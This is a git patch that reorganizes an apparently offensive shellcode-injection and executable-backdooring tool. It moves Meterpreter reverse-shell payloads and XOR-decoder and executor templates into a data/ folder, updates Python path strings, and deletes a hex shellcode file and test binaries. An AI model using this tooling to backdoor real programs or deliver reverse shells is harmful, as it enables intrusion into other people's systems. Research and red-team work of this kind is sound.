From 6175875ea1d149303eb8b7338d230260bb0367a1 Mon Sep 17 00:00:00 2001 From: Dobin Date: Fri, 1 Mar 2024 17:07:01 +0000 Subject: [PATCH] refactor: reorganize files into data/ --- .gitignore | 9 +++-- {exes => data/exes}/7z.exe | Bin {exes => data/exes}/procexp64.exe | Bin {exes => data/exes}/wifiinfoview.exe | Bin {plugins => data/plugins}/allocator/rwx_1.c | 0 {plugins => data/plugins}/decoder/plain_1.c | 0 {plugins => data/plugins}/decoder/xor_1.c | 0 {plugins => data/plugins}/executor/direct_1.c | 0 {shellcodes => data/shellcodes}/calc64.bin | Bin .../shellcodes}/createfile.bin | 0 {shellcodes => data/shellcodes}/createfile.md | 0 .../shellcodes}/meterpreter-revtcp-win64.bin | Bin .../msf-meterpreter-reversetcp.bin | Bin .../shellcodes}/msf-meterpreter-reversetcp.md | 0 .../shellcodes}/msf-revshell-win64.bin | Bin {shellcodes => data/shellcodes}/msfexec.bin | 0 {shellcodes => data/shellcodes}/notepad64.bin | Bin {source => data/source}/iat_reuse/template.c | 0 {source => data/source}/peb_walk/peb_lookup.h | 0 {source => data/source}/peb_walk/template.c | 0 exes/iattest-full.exe | Bin 11264 -> 0 bytes exes/iattest-messagebox.exe | Bin 10752 -> 0 bytes model/defs.py | 4 +-- phases/injector.py | 3 -- phases/templater.py | 28 +++++++-------- shellcodes/convert.py | 24 ------------- shellcodes/createfile.txt | 25 ------------- shellcodes/msf-meterpreter-reversetcp.txt | 33 ------------------ supermega.py | 21 +++++------ tests/test_datareuse.py | 4 +-- tests/test_derbackdoorer.py | 14 ++++---- 31 files changed, 42 insertions(+), 123 deletions(-) rename {exes => data/exes}/7z.exe (100%) rename {exes => data/exes}/procexp64.exe (100%) rename {exes => data/exes}/wifiinfoview.exe (100%) rename {plugins => data/plugins}/allocator/rwx_1.c (100%) rename {plugins => data/plugins}/decoder/plain_1.c (100%) rename {plugins => data/plugins}/decoder/xor_1.c (100%) rename {plugins => data/plugins}/executor/direct_1.c (100%) rename {shellcodes => data/shellcodes}/calc64.bin (100%) rename {shellcodes => data/shellcodes}/createfile.bin (100%) rename {shellcodes => data/shellcodes}/createfile.md (100%) rename {shellcodes => data/shellcodes}/meterpreter-revtcp-win64.bin (100%) rename {shellcodes => data/shellcodes}/msf-meterpreter-reversetcp.bin (100%) rename {shellcodes => data/shellcodes}/msf-meterpreter-reversetcp.md (100%) rename {shellcodes => data/shellcodes}/msf-revshell-win64.bin (100%) rename {shellcodes => data/shellcodes}/msfexec.bin (100%) rename {shellcodes => data/shellcodes}/notepad64.bin (100%) rename {source => data/source}/iat_reuse/template.c (100%) rename {source => data/source}/peb_walk/peb_lookup.h (100%) rename {source => data/source}/peb_walk/template.c (100%) delete mode 100644 exes/iattest-full.exe delete mode 100644 exes/iattest-messagebox.exe delete mode 100644 shellcodes/convert.py delete mode 100644 shellcodes/createfile.txt delete mode 100644 shellcodes/msf-meterpreter-reversetcp.txt diff --git a/.gitignore b/.gitignore index 2017359..c7b208f 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,9 @@ -*infected.exe* -*a.exe* -exes_more/ +*.exe.injected +*-verify.exe +*.infected.exe +app/upload/* +data/exes_more/ +data/shellcodes/*.txt *.obj *.lnk /*.bin diff --git a/exes/7z.exe b/data/exes/7z.exe similarity index 100% rename from exes/7z.exe rename to data/exes/7z.exe diff --git a/exes/procexp64.exe b/data/exes/procexp64.exe similarity index 100% rename from exes/procexp64.exe rename to data/exes/procexp64.exe diff --git a/exes/wifiinfoview.exe b/data/exes/wifiinfoview.exe similarity index 100% rename from exes/wifiinfoview.exe rename to data/exes/wifiinfoview.exe diff --git a/plugins/allocator/rwx_1.c b/data/plugins/allocator/rwx_1.c similarity index 100% rename from plugins/allocator/rwx_1.c rename to data/plugins/allocator/rwx_1.c diff --git a/plugins/decoder/plain_1.c b/data/plugins/decoder/plain_1.c similarity index 100% rename from plugins/decoder/plain_1.c rename to data/plugins/decoder/plain_1.c diff --git a/plugins/decoder/xor_1.c b/data/plugins/decoder/xor_1.c similarity index 100% rename from plugins/decoder/xor_1.c rename to data/plugins/decoder/xor_1.c diff --git a/plugins/executor/direct_1.c b/data/plugins/executor/direct_1.c similarity index 100% rename from plugins/executor/direct_1.c rename to data/plugins/executor/direct_1.c diff --git a/shellcodes/calc64.bin b/data/shellcodes/calc64.bin similarity index 100% rename from shellcodes/calc64.bin rename to data/shellcodes/calc64.bin diff --git a/shellcodes/createfile.bin b/data/shellcodes/createfile.bin similarity index 100% rename from shellcodes/createfile.bin rename to data/shellcodes/createfile.bin diff --git a/shellcodes/createfile.md b/data/shellcodes/createfile.md similarity index 100% rename from shellcodes/createfile.md rename to data/shellcodes/createfile.md diff --git a/shellcodes/meterpreter-revtcp-win64.bin b/data/shellcodes/meterpreter-revtcp-win64.bin similarity index 100% rename from shellcodes/meterpreter-revtcp-win64.bin rename to data/shellcodes/meterpreter-revtcp-win64.bin diff --git a/shellcodes/msf-meterpreter-reversetcp.bin b/data/shellcodes/msf-meterpreter-reversetcp.bin similarity index 100% rename from shellcodes/msf-meterpreter-reversetcp.bin rename to data/shellcodes/msf-meterpreter-reversetcp.bin diff --git a/shellcodes/msf-meterpreter-reversetcp.md b/data/shellcodes/msf-meterpreter-reversetcp.md similarity index 100% rename from shellcodes/msf-meterpreter-reversetcp.md rename to data/shellcodes/msf-meterpreter-reversetcp.md diff --git a/shellcodes/msf-revshell-win64.bin b/data/shellcodes/msf-revshell-win64.bin similarity index 100% rename from shellcodes/msf-revshell-win64.bin rename to data/shellcodes/msf-revshell-win64.bin diff --git a/shellcodes/msfexec.bin b/data/shellcodes/msfexec.bin similarity index 100% rename from shellcodes/msfexec.bin rename to data/shellcodes/msfexec.bin diff --git a/shellcodes/notepad64.bin b/data/shellcodes/notepad64.bin similarity index 100% rename from shellcodes/notepad64.bin rename to data/shellcodes/notepad64.bin diff --git a/source/iat_reuse/template.c b/data/source/iat_reuse/template.c similarity index 100% rename from source/iat_reuse/template.c rename to data/source/iat_reuse/template.c diff --git a/source/peb_walk/peb_lookup.h b/data/source/peb_walk/peb_lookup.h similarity index 100% rename from source/peb_walk/peb_lookup.h rename to data/source/peb_walk/peb_lookup.h diff --git a/source/peb_walk/template.c b/data/source/peb_walk/template.c similarity index 100% rename from source/peb_walk/template.c rename to data/source/peb_walk/template.c diff --git a/exes/iattest-full.exe b/exes/iattest-full.exe deleted file mode 100644 index acf4100e80237ba91d1c5dcc00e1274e37439f5f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 11264 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 ECloTX9{>OV diff --git a/model/defs.py b/model/defs.py index 8ca31b2..34b573e 100644 --- a/model/defs.py +++ b/model/defs.py @@ -4,11 +4,11 @@ import os class FilePath(str): pass -# with shellcodes/createfile.bin +# with data/shellcodes/createfile.bin VerifyFilename: FilePath = r'C:\Temp\a' # Correlated with real template files -# in plugins/ +# in data/plugins/ class AllocStyle(Enum): RWX = "rwx_1" diff --git a/phases/injector.py b/phases/injector.py index e225684..af423d5 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -1,9 +1,6 @@ from helper import * -import shutil -import pprint import logging import time -import tempfile import logging from model.carrier import Carrier, DataReuseEntry diff --git a/phases/templater.py b/phases/templater.py index 5025657..dc8a209 100644 --- a/phases/templater.py +++ b/phases/templater.py @@ -12,8 +12,8 @@ logger = logging.getLogger("Assembler") # INPUT: -# plugins/ -# source/ +# data/plugins/ +# data/source/ # # Output: # build/main.c @@ -34,14 +34,14 @@ def create_c_from_template( source_style.value, alloc_style.value, decoder_style.value, exec_style.value )) - filepath = "plugins/allocator/{}.c".format(alloc_style.value) + filepath = "data/plugins/allocator/{}.c".format(alloc_style.value) with open(filepath, "r", encoding='utf-8') as file: plugin_allocator = file.read() plugin_allocator = Template(plugin_allocator).render({ 'PAYLOAD_LEN': payload_len, }) - filepath = "plugins/decoder/{}.c".format(decoder_style.value) + filepath = "data/plugins/decoder/{}.c".format(decoder_style.value) with open(filepath, "r", encoding='utf-8') as file: plugin_decoder = file.read() plugin_decoder = Template(plugin_decoder).render({ @@ -49,8 +49,8 @@ def create_c_from_template( 'XOR_KEY': config.xor_key, }) - filepath = "plugins/executor/{}.c".format(exec_style.value) - with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file: + filepath = "data/plugins/executor/{}.c".format(exec_style.value) + with open("data/plugins/executor/direct_1.c", "r", encoding='utf-8') as file: plugin_executor = file.read() plugin_executor = Template(plugin_executor).render({ 'PAYLOAD_LEN': payload_len, @@ -58,7 +58,7 @@ def create_c_from_template( if source_style == SourceStyle.peb_walk: if use_templates: - with open("source/peb_walk/template.c", 'r', encoding='utf-8') as file: + with open("data/source/peb_walk/template.c", 'r', encoding='utf-8') as file: template_content = file.read() observer.add_text("main_c_template", template_content) @@ -74,16 +74,16 @@ def create_c_from_template( observer.add_text("main_c_rendered", rendered_template) # TODO PEB - shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h") + shutil.copy("data/source/peb_walk/peb_lookup.h", "build/peb_lookup.h") else: - observer.add_text("main_c", file_readall_text("source/peb_walk/main.c")) - shutil.copy("source/peb_walk/main.c", main_c_file) + observer.add_text("main_c", file_readall_text("data/source/peb_walk/main.c")) + shutil.copy("data/source/peb_walk/main.c", main_c_file) # TODO PEB - shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h") + shutil.copy("data/source/peb_walk/peb_lookup.h", "build/peb_lookup.h") elif source_style == SourceStyle.iat_reuse: if use_templates: - with open("source/iat_reuse/template.c", 'r', encoding='utf-8') as file: + with open("data/source/iat_reuse/template.c", 'r', encoding='utf-8') as file: template_content = file.read() observer.add_text("main_c_template", template_content) template = Template(template_content) @@ -97,5 +97,5 @@ def create_c_from_template( file.write(rendered_template) observer.add_text("main_c_rendered", rendered_template) else: - observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c")) - shutil.copy("source/iat_reuse/main.c", main_c_file) \ No newline at end of file + observer.add_text("main_c", file_readall_text("data/source/iat_reuse/main.c")) + shutil.copy("data/source/iat_reuse/main.c", main_c_file) \ No newline at end of file diff --git a/shellcodes/convert.py b/shellcodes/convert.py deleted file mode 100644 index 3e69620..0000000 --- a/shellcodes/convert.py +++ /dev/null @@ -1,24 +0,0 @@ -# Your input string of escaped hex bytes -#escaped_hex_bytes = "\\x31\\xc0\\x31\\xc9\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x56\\x08\\x8b\\x7e\\x20" - -import sys - -infile = sys.argv[1] -output_file_name = sys.argv[2] - -with open(infile, "r") as f: - escaped_hex_bytes = f.read() - escaped_hex_bytes = escaped_hex_bytes.replace('\n', '') - escaped_hex_bytes = escaped_hex_bytes.replace('\\x', '') - -print(escaped_hex_bytes) - - -# Convert the string with escaped hex bytes to actual binary data -binary_data = bytes.fromhex(escaped_hex_bytes) - -# Write the binary data to a file -with open(output_file_name, "wb") as binary_file: - binary_file.write(binary_data) - -print(f"Binary file created: {output_file_name}") \ No newline at end of file diff --git a/shellcodes/createfile.txt b/shellcodes/createfile.txt deleted file mode 100644 index 738b9e4..0000000 --- a/shellcodes/createfile.txt +++ /dev/null @@ -1,25 +0,0 @@ -\xeb\x27\x5b\x53\x5f\xb0\xa8\xfc\xae\x75\xfd\x57\x59\x53 -\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f -\xb5\x35\x74\x07\x80\x3e\xa8\x75\xea\xeb\xe6\xff\xe1\xe8 -\xd4\xff\xff\xff\x07\xa8\xfb\x4f\x84\xe3\xf7\xef\xc7\x07 -\x07\x07\x46\x56\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f -\x8c\x55\x67\x4f\x8c\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75 -\x57\x4f\x08\xb0\x4d\x4d\x4a\x36\xce\x4f\x36\xc7\xab\x3b -\x66\x7b\x05\x2b\x27\x46\xc6\xce\x0a\x46\x06\xc6\xe5\xea -\x55\x46\x56\x4f\x8c\x55\x27\x8c\x45\x3b\x4f\x06\xd7\x8c -\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73\x60\x4f\x06\xd7\x57 -\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7\xe4\x51\x4f\xf8 -\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce\x4f\x36\xc7 -\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6\x4b\x04 -\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23\x4e -\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7 -\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d 